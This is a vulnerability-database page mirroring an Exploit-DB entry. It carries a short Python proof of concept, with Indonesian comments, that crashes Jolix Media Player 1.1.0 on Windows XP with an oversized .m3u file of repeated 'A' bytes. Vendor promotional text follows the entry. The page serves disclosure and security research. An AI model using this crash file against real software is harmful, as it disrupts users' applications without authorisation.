Lucene search
K

Jolix Media Player 1.1.0 - '.m3u' Denial of Service

🗓️ 10 Jul 2013 00:00:00Reported by IndonesiaGokilTeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Jolix Media Player 1.1.0 Denial of Service exploit for .m3u file format on Windows XP SP 3.

Code
#!/usr/bin/python
print """
 [+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit
 [+]Celah versi: Version 1.1.0
 [+]Mengunduh produk: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe
 [+]Hari Tanggal Tahun: 09.07.2013
 [+]Penulis: IndonesiaGokilTeam
 [+]Dicoba di sistem operasi: Windows xp sp 3
 """

sampah = "\x41" * 1000
ledakan = sampah
  
try:
    rst= open("SampahMasyarakat.m3u",'w')
    rst.write(ledakan)
    rst.close()
    print("\nFile Sampah Masyarakat dibuat !\n")
except:
    print "Gagal"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jul 2013 00:00Current
7.4High risk
Vulners AI Score7.4
23